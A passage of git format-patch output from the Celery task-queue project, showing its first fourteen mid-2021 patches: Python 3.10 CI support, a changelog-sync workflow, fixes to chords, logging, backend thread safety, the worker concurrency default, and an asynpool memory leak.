From 82fe649d8aed5145c5f05d3aabb88ea9721143d4 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 30 Jun 2021 02:29:09 +0300
Subject: [PATCH 001/177] Add Python 3.10 support (#6807)
* Add Python 3.10 support.
* Use the dev release for now.
* Include deps for 3.10.
* Bump moto to support Python 3.10.
* Currently, eventlet is not supported by 3.10.
* Skip if eventlet not found.
* Test 3.10 using tox.
* Try tox-gh-actions.
* Map python versions to tox environments.
* Allow the 3.10 job to fail for now.
---
.github/workflows/python-package.yml | 8 ++++----
requirements/extras/eventlet.txt | 2 +-
requirements/test.txt | 2 +-
t/unit/backends/test_asynchronous.py | 1 +
tox.ini | 23 +++++++++++++----------
5 files changed, 20 insertions(+), 16 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 673e1f04ac8..3f74d81eda7 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', 'pypy3']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.3', 'pypy3']
+ continue-on-error: ${{ matrix.python-version == '3.10.0-beta.3' }}
steps:
- name: Install apt packages
@@ -50,14 +51,13 @@ jobs:
${{ matrix.python-version }}-v1-
- name: Install tox
- run: python -m pip install tox
+ run: python -m pip install tox tox-gh-actions
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
timeout-minutes: 15
run: >
- tox --verbose --verbose -e
- "${{ matrix.python-version }}-unit"
+ tox --verbose --verbose
- uses: codecov/codecov-action@v1
with:
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index e375a087b83..a25cb65d4f0 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1
+eventlet>=0.26.1; python_version<"3.10"
diff --git a/requirements/test.txt b/requirements/test.txt
index 2f08e36f734..0325981f8e8 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -4,7 +4,7 @@ pytest-celery
pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-moto==1.3.7
+moto==2.0.10
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 75ba90baa97..df25a683bc3 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -12,6 +12,7 @@
from celery.utils import cached_property
pytest.importorskip('gevent')
+pytest.importorskip('eventlet')
@pytest.fixture(autouse=True)
diff --git a/tox.ini b/tox.ini
index 51cf5d0209d..6c74e65576b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,7 +1,9 @@
[tox]
+requires =
+ tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9,pypy3}-unit
- {3.6,3.7,3.8,3.9,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.6,3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.6,3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
@@ -11,11 +13,12 @@ envlist =
[gh-actions]
python =
- 3.6: 3.6
- 3.7: 3.7
- 3.8: 3.8
- 3.9: 3.9
- pypy3: pypy3
+ 3.6: 3.6-unit
+ 3.7: 3.7-unit
+ 3.8: 3.8-unit
+ 3.9: 3.9-unit
+ 3.10: 3.10-unit
+ pypy3: pypy3-unit
[testenv]
sitepackages = False
@@ -28,9 +31,8 @@ deps=
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/test-ci-default.txt
- 3.5,3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/docs.txt
- 3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/docs.txt
+ 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
@@ -75,6 +77,7 @@ basepython =
3.7: python3.7
3.8: python3.8
3.9: python3.9
+ 3.10: python3.10
pypy3: pypy3
flake8,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
From c33e9b2a6905a239c45e6f50437394db69fa41db Mon Sep 17 00:00:00 2001
From: "Steinar V. Kaldager"
Date: Wed, 30 Jun 2021 19:21:06 +0200
Subject: [PATCH 002/177] Fix docstring for Signal.send to match code
---
celery/utils/dispatch/signal.py | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/celery/utils/dispatch/signal.py b/celery/utils/dispatch/signal.py
index b12759c4f37..0cfa6127ed0 100644
--- a/celery/utils/dispatch/signal.py
+++ b/celery/utils/dispatch/signal.py
@@ -254,9 +254,9 @@ def has_listeners(self, sender=None):
def send(self, sender, **named):
"""Send signal from sender to all connected receivers.
- If any receiver raises an error, the error propagates back through
- send, terminating the dispatch loop, so it is quite possible to not
- have all receivers called if a raises an error.
+ If any receiver raises an error, the exception is returned as the
+ corresponding response. (This is different from the "send" in
+ Django signals. In Celery "send" and "send_robust" do the same thing.)
Arguments:
sender (Any): The sender of the signal.
From 3ec65fd7601567b22e1614a750738e6e5c9002dc Mon Sep 17 00:00:00 2001
From: Jonas Kittner
Date: Fri, 2 Jul 2021 18:30:06 +0200
Subject: [PATCH 003/177] fix: no blank line in log output
---
celery/utils/log.py | 1 +
t/unit/app/test_log.py | 4 +++-
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 58f194755a2..8ca34e7c5ae 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -223,6 +223,7 @@ def write(self, data):
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
return 0
+ data = data.rstrip('\n')
if data and not self.closed:
self._thread.recurse_protection = True
try:
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 971692497c4..cbe191f41d6 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -268,8 +268,10 @@ def test_logging_proxy(self):
p.write('foo')
assert 'foo' not in sio.getvalue()
p.closed = False
+ p.write('\n')
+ assert sio.getvalue() == ''
write_res = p.write('foo ')
- assert 'foo ' in sio.getvalue()
+ assert sio.getvalue() == 'foo \n'
assert write_res == 4
lines = ['baz', 'xuzzy']
p.writelines(lines)
From 3973e30da819dbe878d9b9a4ab51765a9075f6d6 Mon Sep 17 00:00:00 2001
From: Nahin Khan
Date: Mon, 5 Jul 2021 22:34:10 +0300
Subject: [PATCH 004/177] Fix typo
---
docs/getting-started/first-steps-with-celery.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index 13bdc8cc429..799db7200d7 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -141,7 +141,7 @@ This is only needed so that names can be automatically generated when the tasks
defined in the `__main__` module.
The second argument is the broker keyword argument, specifying the URL of the
-message broker you want to use. Here using RabbitMQ (also the default option).
+message broker you want to use. Here we are using RabbitMQ (also the default option).
See :ref:`celerytut-broker` above for more choices --
for RabbitMQ you can use ``amqp://localhost``, or for Redis you can
From e972affc0ac14a92492fea59354d4be5f8260e92 Mon Sep 17 00:00:00 2001
From: Issa Jubril
Date: Tue, 6 Jul 2021 17:43:11 +0100
Subject: [PATCH 005/177] Update copyright (#6842)
---
docs/conf.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/conf.py b/docs/conf.py
index 6cc0f92fe64..d5c4c9276fa 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -10,7 +10,7 @@
github_project='celery/celery',
author='Ask Solem & contributors',
author_name='Ask Solem',
- copyright='2009-2018',
+ copyright='2009-2021',
publisher='Celery Project',
html_logo='images/celery_512.png',
html_favicon='images/favicon.ico',
From e885a47b0c73aef0112bf989a2642c125889a2ca Mon Sep 17 00:00:00 2001
From: Dave Gaeddert
Date: Wed, 7 Jul 2021 13:04:24 -0500
Subject: [PATCH 006/177] Use the dropseed/changerelease action to sync
changelog to GitHub Releases (#6843)
* Create changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Add workflow permissions
---
.github/workflows/changerelease.yml | 32 +++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 .github/workflows/changerelease.yml
diff --git a/.github/workflows/changerelease.yml b/.github/workflows/changerelease.yml
new file mode 100644
index 00000000000..efbf5a52fef
--- /dev/null
+++ b/.github/workflows/changerelease.yml
@@ -0,0 +1,32 @@
+name: changerelease
+on:
+ workflow_dispatch: {}
+ push:
+ paths: [Changelog.rst]
+ branches: [master]
+ tags: ["*"]
+
+permissions:
+ contents: write
+
+jobs:
+ sync:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: docker://pandoc/core:2.14
+ with:
+ args: "Changelog.rst -f rst -t markdown -o CR_CHANGELOG.md"
+ - name: "Clean up markdown"
+ run: |
+ # https://stackoverflow.com/a/1252191/1110798
+ cat CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-date\n\n: /Release date: /g' CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-by\n\n: /Release by: /g' CR_CHANGELOG.md
+ cat CR_CHANGELOG.md
+ - uses: dropseed/changerelease@v1
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ changelog: CR_CHANGELOG.md
+ remote_changelog: false
+ limit: -1
From 52b6238a87f80c3c63d79595deb375518af95372 Mon Sep 17 00:00:00 2001
From: ghoulmaster
Date: Fri, 9 Jul 2021 01:26:04 -0400
Subject: [PATCH 007/177] Chords, get body_type independently to handle cases
where body.type does not exist ... (#6847)
* Get body_type independently to handle cases where body.type does not exist due to tasks being created via Signatures
* body.get() was returning None always, must getattr() and catch the NotRegistered Error if the app that generated the task is not the app that owns the task
* flake8 fix for too many blank lines
---
celery/backends/base.py | 9 +++++++--
t/unit/backends/test_base.py | 15 +++++++++++++++
2 files changed, 22 insertions(+), 2 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index f7ef15f53de..fb1cc408d49 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -644,8 +644,13 @@ def set_chord_size(self, group_id, chord_size):
def fallback_chord_unlock(self, header_result, body, countdown=1,
**kwargs):
kwargs['result'] = [r.as_tuple() for r in header_result]
- queue = body.options.get('queue', getattr(body.type, 'queue', None))
- priority = body.options.get('priority', getattr(body.type, 'priority', 0))
+ try:
+ body_type = getattr(body, 'type', None)
+ except NotRegistered:
+ body_type = None
+
+ queue = body.options.get('queue', getattr(body_type, 'queue', None))
+ priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
countdown=countdown,
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 5d98877637d..5d04e8a7d03 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -220,6 +220,21 @@ def callback_queue(result):
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue_two'
+ with self.Celery() as app2:
+ @app2.task(name='callback_different_app', shared=False)
+ def callback_different_app(result):
+ pass
+
+ callback_different_app_signature = self.app.signature('callback_different_app')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] is None
+
+ callback_different_app_signature.set(queue='test_queue_three')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'test_queue_three'
+
class test_exception_pickle:
def test_BaseException(self):
From 1b67ccdaafd0bde67b46bc38827b3ef5f8b65444 Mon Sep 17 00:00:00 2001
From: Dash J <4606735+djungic@users.noreply.github.com>
Date: Fri, 9 Jul 2021 16:49:31 +0100
Subject: [PATCH 008/177] Fix #6844 by allowing safe queries via
app.inspect().active(). (#6849)
* Fix #6844 by allowing safe (i.e. skip arg deserialization) queries via app.inspect().active().
* Fix default active arg test expectation.
* Fix test asserting broken behaviour (arg/kwarg deserialization occurring when safe=True).
Co-authored-by: Damir Jungic
---
celery/app/control.py | 7 +++----
celery/worker/control.py | 4 ++--
celery/worker/request.py | 4 ++--
t/unit/app/test_control.py | 6 +++++-
t/unit/worker/test_control.py | 14 ++++++++++++++
t/unit/worker/test_request.py | 4 ++--
6 files changed, 28 insertions(+), 11 deletions(-)
diff --git a/celery/app/control.py b/celery/app/control.py
index 05b7012ac3d..742b5e5be3b 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -135,6 +135,8 @@ def clock(self):
def active(self, safe=None):
"""Return list of tasks currently executed by workers.
+ Arguments:
+ safe (Boolean): Set to True to disable deserialization.
Returns:
Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
@@ -142,11 +144,8 @@ def active(self, safe=None):
See Also:
For ``TASK_INFO`` details see :func:`query_task` return value.
- Note:
- ``safe`` is ignored since 4.0 as no objects will need
- serialization now that we have argsrepr/kwargsrepr.
"""
- return self._request('active')
+ return self._request('active', safe=safe)
def scheduled(self, safe=None):
"""Return list of scheduled tasks with details.
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 9d8a6797dee..9dd00d22a97 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -362,9 +362,9 @@ def reserved(state, **kwargs):
@inspect_command(alias='dump_active')
-def active(state, **kwargs):
+def active(state, safe=False, **kwargs):
"""List of tasks currently being executed."""
- return [request.info()
+ return [request.info(safe=safe)
for request in state.tset(worker_state.active_requests)]
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 1760fa489cf..7cdb87fe054 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -600,8 +600,8 @@ def info(self, safe=False):
return {
'id': self.id,
'name': self.name,
- 'args': self._args,
- 'kwargs': self._kwargs,
+ 'args': self._args if not safe else self._argsrepr,
+ 'kwargs': self._kwargs if not safe else self._kwargsrepr,
'type': self._type,
'hostname': self._hostname,
'time_start': self.time_start,
diff --git a/t/unit/app/test_control.py b/t/unit/app/test_control.py
index 2a80138c09b..37fa3e8b2ae 100644
--- a/t/unit/app/test_control.py
+++ b/t/unit/app/test_control.py
@@ -95,7 +95,11 @@ def assert_broadcast_called(self, command,
def test_active(self):
self.inspect.active()
- self.assert_broadcast_called('active')
+ self.assert_broadcast_called('active', safe=None)
+
+ def test_active_safe(self):
+ self.inspect.active(safe=True)
+ self.assert_broadcast_called('active', safe=True)
def test_clock(self):
self.inspect.clock()
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index c2edc58696c..72ea98c4603 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -298,6 +298,20 @@ def test_active(self):
finally:
worker_state.active_requests.discard(r)
+ def test_active_safe(self):
+ kwargsrepr = ''
+ r = Request(
+ self.TaskMessage(self.mytask.name, id='do re mi',
+ kwargsrepr=kwargsrepr),
+ app=self.app,
+ )
+ worker_state.active_requests.add(r)
+ try:
+ active_resp = self.panel.handle('dump_active', {'safe': True})
+ assert active_resp[0]['kwargs'] == kwargsrepr
+ finally:
+ worker_state.active_requests.discard(r)
+
def test_pool_grow(self):
class MockPool:
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 176c88e21d7..9a6832bbd04 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -232,7 +232,7 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == kwargs
+ self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,7 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == args
+ self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
From 5fd182417d9a6cb1b5aebe29916814d7a725e62a Mon Sep 17 00:00:00 2001
From: Konstantin Kochin
Date: Sun, 11 Jul 2021 19:52:33 +0300
Subject: [PATCH 009/177] Fix multithreaded backend usage (#6851)
* Add test of backend usage by threads
Add simple test with embedded worker that checks
backend instance usage by threads. According to
merge request #6416 backends should be thread local.
* Fix backend captures in the `celery.app.trace.build_tracer`
* Fix backend capturing by closure during task creation in the function `celery.app.trace.build_tracer`, as different threads may create and use celery tasks. It complements changes in pull request #6416.
* Fix flake8 errors
Fix flake8 errors from Celery/lint github workflow step
---
CONTRIBUTORS.txt | 1 +
celery/app/control.py | 1 +
celery/app/trace.py | 11 ++--
t/unit/app/test_backends.py | 99 +++++++++++++++++++++++++++++++++++
t/unit/worker/test_request.py | 4 +-
5 files changed, 106 insertions(+), 10 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 17fe5d9442b..9a1f42338e8 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -282,3 +282,4 @@ Henrik Bruåsdal, 2020/11/29
Tom Wojcik, 2021/01/24
Ruaridh Williamson, 2021/03/09
Patrick Zhang, 2017/08/19
+Konstantin Kochin, 2021/07/11
diff --git a/celery/app/control.py b/celery/app/control.py
index 742b5e5be3b..8bde53aebe1 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -135,6 +135,7 @@ def clock(self):
def active(self, safe=None):
"""Return list of tasks currently executed by workers.
+
Arguments:
safe (Boolean): Set to True to disable deserialization.
diff --git a/celery/app/trace.py b/celery/app/trace.py
index 9a56f870768..a5e3fc3f5a8 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -325,7 +325,6 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
fun = task if task_has_custom(task, '__call__') else task.run
loader = loader or app.loader
- backend = task.backend
ignore_result = task.ignore_result
track_started = task.track_started
track_started = not eager and (task.track_started and not ignore_result)
@@ -353,10 +352,6 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
if task_has_custom(task, 'after_return'):
task_after_return = task.after_return
- store_result = backend.store_result
- mark_as_done = backend.mark_as_done
- backend_cleanup = backend.process_cleanup
-
pid = os.getpid()
request_stack = task.request_stack
@@ -440,7 +435,7 @@ def trace_task(uuid, args, kwargs, request=None):
args=args, kwargs=kwargs)
loader_task_init(uuid, task)
if track_started:
- store_result(
+ task.backend.store_result(
uuid, {'pid': pid, 'hostname': hostname}, STARTED,
request=task_request,
)
@@ -514,7 +509,7 @@ def trace_task(uuid, args, kwargs, request=None):
parent_id=uuid, root_id=root_id,
priority=task_priority
)
- mark_as_done(
+ task.backend.mark_as_done(
uuid, retval, task_request, publish_result,
)
except EncodeError as exc:
@@ -551,7 +546,7 @@ def trace_task(uuid, args, kwargs, request=None):
pop_request()
if not eager:
try:
- backend_cleanup()
+ task.backend.process_cleanup()
loader_cleanup()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
diff --git a/t/unit/app/test_backends.py b/t/unit/app/test_backends.py
index a87f9665053..df4e47af772 100644
--- a/t/unit/app/test_backends.py
+++ b/t/unit/app/test_backends.py
@@ -1,10 +1,87 @@
+import threading
+from contextlib import contextmanager
from unittest.mock import patch
import pytest
+import celery.contrib.testing.worker as contrib_embed_worker
from celery.app import backends
from celery.backends.cache import CacheBackend
from celery.exceptions import ImproperlyConfigured
+from celery.utils.nodenames import anon_nodename
+
+
+class CachedBackendWithTreadTrucking(CacheBackend):
+ test_instance_count = 0
+ test_call_stats = {}
+
+ def _track_attribute_access(self, method_name):
+ cls = type(self)
+
+ instance_no = getattr(self, '_instance_no', None)
+ if instance_no is None:
+ instance_no = self._instance_no = cls.test_instance_count
+ cls.test_instance_count += 1
+ cls.test_call_stats[instance_no] = []
+
+ cls.test_call_stats[instance_no].append({
+ 'thread_id': threading.get_ident(),
+ 'method_name': method_name
+ })
+
+ def __getattribute__(self, name):
+ if name == '_instance_no' or name == '_track_attribute_access':
+ return super().__getattribute__(name)
+
+ if name.startswith('__') and name != '__init__':
+ return super().__getattribute__(name)
+
+ self._track_attribute_access(name)
+ return super().__getattribute__(name)
+
+
+@contextmanager
+def embed_worker(app,
+ concurrency=1,
+ pool='threading', **kwargs):
+ """
+ Helper embedded worker for testing.
+
+ It's based on a :func:`celery.contrib.testing.worker.start_worker`,
+ but doesn't modifies logging settings and additionally shutdown
+ worker pool.
+ """
+ # prepare application for worker
+ app.finalize()
+ app.set_current()
+
+ worker = contrib_embed_worker.TestWorkController(
+ app=app,
+ concurrency=concurrency,
+ hostname=anon_nodename(),
+ pool=pool,
+ # not allowed to override TestWorkController.on_consumer_ready
+ ready_callback=None,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
+ without_mingle=True,
+ without_gossip=True,
+ **kwargs
+ )
+
+ t = threading.Thread(target=worker.start, daemon=True)
+ t.start()
+ worker.ensure_started()
+
+ yield worker
+
+ worker.stop()
+ t.join(10.0)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
class test_backends:
@@ -35,3 +112,25 @@ def test_sym_raises_ValuError(self, app):
def test_backend_can_not_be_module(self, app):
with pytest.raises(ImproperlyConfigured):
backends.by_name(pytest, app.loader)
+
+ @pytest.mark.celery(
+ result_backend=f'{CachedBackendWithTreadTrucking.__module__}.'
+ f'{CachedBackendWithTreadTrucking.__qualname__}'
+ f'+memory://')
+ def test_backend_thread_safety(self):
+ @self.app.task
+ def dummy_add_task(x, y):
+ return x + y
+
+ with embed_worker(app=self.app, pool='threads'):
+ result = dummy_add_task.delay(6, 9)
+ assert result.get(timeout=10) == 15
+
+ call_stats = CachedBackendWithTreadTrucking.test_call_stats
+ # check that backend instance is used without same thread
+ for backend_call_stats in call_stats.values():
+ thread_ids = set()
+ for call_stat in backend_call_stats:
+ thread_ids.add(call_stat['thread_id'])
+ assert len(thread_ids) <= 1, \
+ "The same celery backend instance is used by multiple threads"
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 9a6832bbd04..8e6e92d63ee 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -232,7 +232,7 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
+ self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,7 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
+ self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
From 044cebaa533db7629670db1fdb3173e0951522af Mon Sep 17 00:00:00 2001
From: "Lewis M. Kabui" <13940255+lewisemm@users.noreply.github.com>
Date: Tue, 13 Jul 2021 10:11:44 +0300
Subject: [PATCH 010/177] Fix Open Collective donate button (#6848)
* Fix Open Collective donate button
Fixes #6828
* Use OpenCollective anchor button
- Replace OpenCollective button script with an anchor tag. The button
script imposes a fixed width of 300px which makes it too big and
out of place relative to neighbouring HTML elements.
Co-authored-by: Lewis Kabui
---
docs/_templates/sidebardonations.html | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/docs/_templates/sidebardonations.html b/docs/_templates/sidebardonations.html
index 9049cab2cab..2eebc8ec0bc 100644
--- a/docs/_templates/sidebardonations.html
+++ b/docs/_templates/sidebardonations.html
@@ -1,8 +1,9 @@
-
Donations
Please help support this community project with a donation.
-
+
+
+
From 7b5a44d646f43288fb546da10a1141347b01543b Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Sun, 11 Jul 2021 23:15:34 -0300
Subject: [PATCH 011/177] Fix setting worker concurrency option after signal
Allow to set "worker_concurrency" option through
"user_preload_options" signal mechanism.
Current behaviour:
1. "click.option" decorator for "--concurrency" option is executed,
its callback returns "0" when evaluating "value or
ctx.obj.app.conf.worker_concurrency" (None or 0). This default "0"
comes from "app.defaults".
2. Celery "user_preload_options" signal is processed, then
"app.conf.worker_concurrency" value is correctly updated through
"Settings.update".
3. Celery "worker.worker.WorkController.setup_defaults" kicks off
and "concurrency" attribute is resolved with
"either('worker_concurrency', concurrency)"
4. "either" method (app.base) chains calls to "first" function with
"None" as predicate (returns the first item that's not "None"),
in our case "first(None, defaults)" (defaults=(0,)) will take
precedence and "0" will be returned, whatever value is in
"app.conf.worker_concurrency".
This fix changes "worker_concurrency" default from "0" to "None"
allowing "either" method to correctly resolve in favor
of "app.conf.worker_concurrency" value.
The final value used as concurrency is resolved in "worker.worker"
with conditional "if not self.concurrency" thus having "None"
as default value for "self.concurrency" doesn't break things.
Fixes #6836
---
celery/app/defaults.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index 1883f2565bb..70f4fb8b0ac 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -294,7 +294,7 @@ def __repr__(self):
cancel_long_running_tasks_on_connection_loss=Option(
False, type='bool'
),
- concurrency=Option(0, type='int'),
+ concurrency=Option(None, type='int'),
consumer=Option('celery.worker.consumer:Consumer', type='string'),
direct=Option(False, type='bool', old={'celery_worker_direct'}),
disable_rate_limits=Option(
From ca489c6f7767ed796bce10400321fe08b4820c0c Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 14 Jul 2021 03:18:18 +0300
Subject: [PATCH 012/177] Make ``ResultSet.on_ready`` promise hold a weakref to
self. (#6784)
---
celery/result.py | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/celery/result.py b/celery/result.py
index 0c10d58e86c..d8d7d1685c5 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -2,6 +2,7 @@
import datetime
import time
+from weakref import proxy
from collections import deque
from contextlib import contextmanager
@@ -535,7 +536,7 @@ class ResultSet(ResultBase):
def __init__(self, results, app=None, ready_barrier=None, **kwargs):
self._app = app
self.results = results
- self.on_ready = promise(args=(self,))
+ self.on_ready = promise(args=(proxy(self),))
self._on_full = ready_barrier or barrier(results)
if self._on_full:
self._on_full.then(promise(self._on_ready, weak=True))
From 2dfb6fb3c9b8a0908c908a0d93e79fba90f02c5d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Przemys=C5=82aw=20=C5=81ada?=
Date: Mon, 19 Jul 2021 12:17:22 +0200
Subject: [PATCH 013/177] Update configuration.rst
Update default `worker_task_log_format` value
---
docs/userguide/configuration.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 739dc5680c4..14fa89df2ca 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -3006,7 +3006,7 @@ Default:
.. code-block:: text
"[%(asctime)s: %(levelname)s/%(processName)s]
- [%(task_name)s(%(task_id)s)] %(message)s"
+ %(task_name)s[%(task_id)s]: %(message)s"
The format to use for log messages logged in tasks.
From 41b2d2e50205b92bab08a2401c104c2cb818bdd4 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 20 Jul 2021 02:04:21 +0300
Subject: [PATCH 014/177] Discard jobs on flush if synack isn't enabled.
(#6863)
Fixes #6855.
A connection loss flushes the asynpool (See https://github.com/celery/celery/blob/117cd9ca410e8879f71bd84be27b8e69e462c56a/celery/worker/consumer/consumer.py#L414).
This is expected as these jobs cannot be completed anymore.
However, jobs which have not been accepted yet (that is, they are not running yet) are cancelled. This only works if the synack keyword argument is set to True.
In our case, it isn't and therefore the jobs remain in the pool's cache forever.
This is a memory leak which we have now resolved by discarding the job (which clears it from the cache) as they will never be cancelled.
---
celery/concurrency/asynpool.py | 10 +++++++---
1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index f4d1c475a8e..c6612aff64f 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -978,10 +978,14 @@ def _write_ack(fd, ack, callback=None):
def flush(self):
if self._state == TERMINATE:
return
- # cancel all tasks that haven't been accepted so that NACK is sent.
- for job in self._cache.values():
+ # cancel all tasks that haven't been accepted so that NACK is sent
